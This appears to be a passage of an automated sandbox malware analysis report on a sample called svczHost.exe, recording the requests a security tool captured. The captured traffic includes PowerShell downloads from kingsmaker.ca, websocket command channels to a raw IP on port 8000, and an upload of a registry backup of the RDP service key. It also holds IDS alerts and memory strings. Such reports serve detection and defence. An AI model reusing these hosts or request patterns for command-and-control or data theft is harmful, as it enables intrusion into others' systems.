Source: C:\Windows\Temp\svczHost.exe	File opened: C:\Windows\Temp\D2526140-28DE-4516-A926-80A0BB7F1F2E-Sigs\NULL
Source: C:\Windows\Temp\svczHost.exe	File opened: C:\Windows\Temp\CzxeZkonPYZsXfBdDDcOrmpy\NULL
Source: C:\Windows\Temp\svczHost.exe	File opened: C:\Windows\Temp\CzxeZkonPYZsXfBdDDcOrmpy
Source: C:\Windows\Temp\svczHost.exe	File opened: C:\Windows\Temp\CzxeZkonPYZsXfBdDDcOrmpy\config.cfg
Source: C:\Windows\Temp\svczHost.exe	File opened: C:\Windows\Temp\Crashpad\reports\NULL

Networking

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp

String found in memory: <   "><a href="http://style="float:left;concerned with the=http%3A%2F%2Fwww.in popular culturetype="text/css" />it is possible to Harvard Universitytylesheet" href="/the main characterOxford University name="keywords" cstyle="text-align:the United Kingdomfederal government<div style="margin depending on the description of the<div class="header.min.js"></script>destruction of theslightly differentin accordance withtelecommunicationsindicates that theshortly thereafterespecially in the European countriesHowever, there aresrc="http://staticsuggested that the" src="http://www.a large number of Telecommunications" rel="nofollow" tHoly Roman Emperoralmost exclusively" border="0" alt="Secretary of Stateculminating in theCIA World Factbookthe most importantanniversary of thestyle="background-<li><em><a href="/the Atlantic Oceanstrictly speaking,shortly before thedifferent types ofthe Ottoman Empire><img src="http://An Introduction toconsequence of thedeparture from theConfederate Statesindigenous peoplesProceedings of theinformation on thetheories have beeninvolvement in thedivided into threeadjacent countriesis responsible fordissolution of thecollaboration withwidely regarded ashis contemporariesfounding member ofDominican Republicgenerally acceptedthe possibility ofare also availableunder constructionrestoration of thethe general publicis almost entirelypasses through thehas been suggestedcomputer and videoGermanic languages according to the different from theshortly afterwardshref="https://www.recent developmentBoard of Directors<div class="search| <a href="http://In particular, theMultiple footnotesor other substancethousands of yearstranslation of the</div>

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49764

Source: global traffic

TCP traffic: 192.168.11.20:49760 -> 23.88.71.29:8000

Source: global traffic	HTTP traffic detected: GET /StaticFile/RdpService/52 HTTP/1.1Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /StaticFile/TermServiceTryRun/46 HTTP/1.1Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /api/check HTTP/1.1Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: TKWF3o80RkqumbfeJjv41Q==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: POST /api/registry HTTP/1.1Host: 23.88.71.29:8000Connection: Keep-AliveContent-Type: application/jsonContent-Length: 102Data Raw: 22 36 33 30 31 33 33 37 32 46 36 35 37 35 41 39 44 34 45 41 32 39 43 42 36 30 38 37 39 38 45 44 39 7c 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 7c 31 30 2e 30 2e 31 39 30 34 32 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 32 2d 31 30 2e 30 2e 31 39 30 34 31 2e 31 30 38 31 22 Data Ascii: "63013372F6575A9D4EA29CB608798ED9\|Microsoft Windows 10 Pro\|10.0.19042 N/A Build 19042-10.0.19041.1081"
Source: global traffic	HTTP traffic detected: POST /api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757 HTTP/1.1Host: 23.88.71.29:8000Connection: Keep-AliveContent-Type: multipart/form-data; boundary=---------------------8dd10253a34234bContent-Length: 5689Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 32 35 33 61 33 34 32 33 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 67 42 61 63 6b 75 70 2e 72 65 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff fe 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6f 00 72 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 35 00 2e 00 30 00 30 00 0d 00 0a 00 0d 00 0a 00 5b 00 48 00 4b 00 45 00 59 00 5f 00 4c 00 4f 00 43 00 41 00 4c 00 5f 00 4d 00 41 00 43 00 48 00 49 00 4e 00 45 00 5c 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5c 00 54 00 65 00 72 00 6d 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 5d 00 0d 00 0a 00 22 00 44 00 65 00 70 00 65 00 6e 00 64 00 4f 00 6e 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 22 00 3d 00 68 00 65 00 78 00 28 00 37 00 29 00 3a 00 35 00 32 00 2c 00 30 00 30 00 2c 00 35 00 30 00 2c 00 30 00 30 00 2c 00 34 00 33 00 2c 00 30 00 30 00 2c 00 35 00 33 00 2c 00 30 00 30 00 2c 00 35 00 33 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 0d 00 0a 00 22 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 22 00 3d 00 22 00 40 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 5c 00 74 00 65 00 72 00 6d 00 73 00 72 00 76 00 2e 00 64 00 6c 00 6c 00 2c 00 2d 00 32 00 36 00 37 00 22 00 0d 00 0a 00 22 00 44 00 69 00 73 00 70 00 6c 00 61 00 79 00 4e 00 61 00 6d 00 65 00 22 00 3d 00 22 00 40 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 5c 00 74 00 65 00 72 00 6d 00 73 00 72 00 76 00 2e 00 64 00 6c 00 6c 00 2c 00 2d 00 32 00 36 00 38 00 22 00 0d 00 0a 00 22 00 45 00 72 00 72 00 6f 00 72 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 22 00 3d 00 64 00 77 00 6f 00 72 00 64 00 3a 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 31 00 0d 00 0a 00 22 00 46 00 61 00 69 00 6c 00 75 00 72 00 65 00 41 00 63 00 74 00 69 00 6f 00 6e 00 73 00 22 00 3d 00 68 00 65 00 78 00 3a 00 38 00 30 00 2c 00 35 00 31 00 2c 00 30 00 31 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 33 00
Source: global traffic	HTTP traffic detected: GET /command/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: Gm2s7evn+UG3WIExr2XKhQ==Sec-WebSocket-Version: 13

Source: Joe Sandbox View	IP Address: 172.67.179.67 172.67.179.67
Source: Joe Sandbox View	IP Address: 23.88.71.29 23.88.71.29

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49739 -> 172.67.179.67:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49737 -> 172.67.179.67:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49752 -> 172.67.179.67:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49758 -> 172.67.179.67:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49765 -> 172.67.179.67:443

Source: global traffic	HTTP traffic detected: GET /file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59ea3fe07e54381481ca0bece87f5a691b18216ec8f663043055b37a6c8d7a59731af4b6e1340bfd787088106580f90f257aa865ae7b57e00e4873a697e/Windows%20Defender/16/16/user/209 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663bb648db58ef92bd3c982ad93b9ec563 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 302
Source: global traffic	HTTP traffic detected: GET /file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522edb4c2cc6c8aa8275b28d356e62b21287f073b49fa8071c3b9b230e0be0956bdede2a75925f23344959b9fe0fd9f829d94ffeee7dfe68b77418c356c1d95c4ddba34383a8308b2f4fdd59f7367 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66d3f1253c06c3f32eac3615742d73a5eb HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 302
Source: global traffic	HTTP traffic detected: GET /file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be53bdebcdef5aacc13bbe01d56c85c91fad8c9b5e4884b741db2ee8f3a341e996a09fa3ade76a4e05f7f0974e4b6acbc75d0f6c645f96d06ea4d04590f12a7ca8a7453339c787d192c681aca6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663ea0555ae9c0d65b965f4e05b0696583 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 85
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663ea0555ae9c0d65b965f4e05b0696583 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 86
Source: global traffic	HTTP traffic detected: GET /file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8c7b2f19233540c7f291919f9c9191eff7a5de7868f190137bd7c2f225e9653c0a8361473c2464503478c32210e436919ed4dab25f52021847773e83d150bf92182d21b4dc33f01eee91ea1fa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663ea0555ae9c0d65b965f4e05b0696583 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 62
Source: global traffic	HTTP traffic detected: GET /file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce34edb9a83c7f16af980 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 140
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce34edb9a83c7f16af980 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 69
Source: global traffic	HTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ace61ec66f52d29b28a8a4a890956d54d1d9e24579c740190b8799b1b67a5f4a6dff13c00dd57d89558c4a1e3705f0cd3f182dd3fb5270007203188fb6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce34edb9a83c7f16af980 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 200
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce34edb9a83c7f16af980 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 97
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce34edb9a83c7f16af980 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 64

Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59ea3fe07e54381481ca0bece87f5a691b18216ec8f663043055b37a6c8d7a59731af4b6e1340bfd787088106580f90f257aa865ae7b57e00e4873a697e/Windows%20Defender/16/16/user/209 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522edb4c2cc6c8aa8275b28d356e62b21287f073b49fa8071c3b9b230e0be0956bdede2a75925f23344959b9fe0fd9f829d94ffeee7dfe68b77418c356c1d95c4ddba34383a8308b2f4fdd59f7367 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be53bdebcdef5aacc13bbe01d56c85c91fad8c9b5e4884b741db2ee8f3a341e996a09fa3ade76a4e05f7f0974e4b6acbc75d0f6c645f96d06ea4d04590f12a7ca8a7453339c787d192c681aca6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8c7b2f19233540c7f291919f9c9191eff7a5de7868f190137bd7c2f225e9653c0a8361473c2464503478c32210e436919ed4dab25f52021847773e83d150bf92182d21b4dc33f01eee91ea1fa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ace61ec66f52d29b28a8a4a890956d54d1d9e24579c740190b8799b1b67a5f4a6dff13c00dd57d89558c4a1e3705f0cd3f182dd3fb5270007203188fb6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /StaticFile/RdpService/52 HTTP/1.1Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /StaticFile/TermServiceTryRun/46 HTTP/1.1Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /api/check HTTP/1.1Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: TKWF3o80RkqumbfeJjv41Q==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: GET /command/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: Gm2s7evn+UG3WIExr2XKhQ==Sec-WebSocket-Version: 13

Source: global traffic

DNS traffic detected: DNS query: kingsmaker.ca

Source: unknown

HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663bb648db58ef92bd3c982ad93b9ec563 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 302

Source: powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.css
Source: powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.jpg
Source: powershell.exe, 00000000.00000002.3644439665.0000015FEBCBD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3533295106.000002B4FAF70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4436671344.00000223E52D4000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4740236160.0000030543F00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4136909303.000002AAEBB18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.3644439665.0000015FEBCBD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3533295106.000002B4FAF70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4428816294.00000223E52A0000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4740236160.0000030543F00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4136909303.000002AAEBAE5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3839314354.0000024E4AE48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000008.00000002.4512239219.00000223E67F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000014.00000002.4095227779.0000024E63E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microQI
Source: powershell.exe, 00000004.00000002.3535529194.000002B4FB435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000004.00000002.3535529194.000002B4FB435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsof/crl/products/MicTimStaPCA_2010-07-01.crl0Z
Source: powershell.exe, 00000010.00000002.4147110154.000002AAEBE2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.c
Source: powershell.exe, 00000010.00000002.4136909303.000002AAEBAE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: svczHost.exe, 0000000C.00000002.4734447817.000002C4B00BD000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4734447817.000002C4B00A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://kingsmaker.ca:443/x
Source: powershell.exe, 00000000.00000002.3636123689.0000015F9007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3636123689.0000015F9021D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B481648000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3528495441.000002B49007B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4319253309.00000223DD26D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4104980578.000002AAE3A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4104980578.000002AAE3B99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD4E2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4043493845.0000024E5BBA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.3512132506.000002B4814F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD3C0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.3608263403.0000015F8022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B480269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD3C0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000004.00000002.3512132506.000002B4814CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B4814F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: powershell.exe, 00000004.00000002.3512132506.000002B480269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
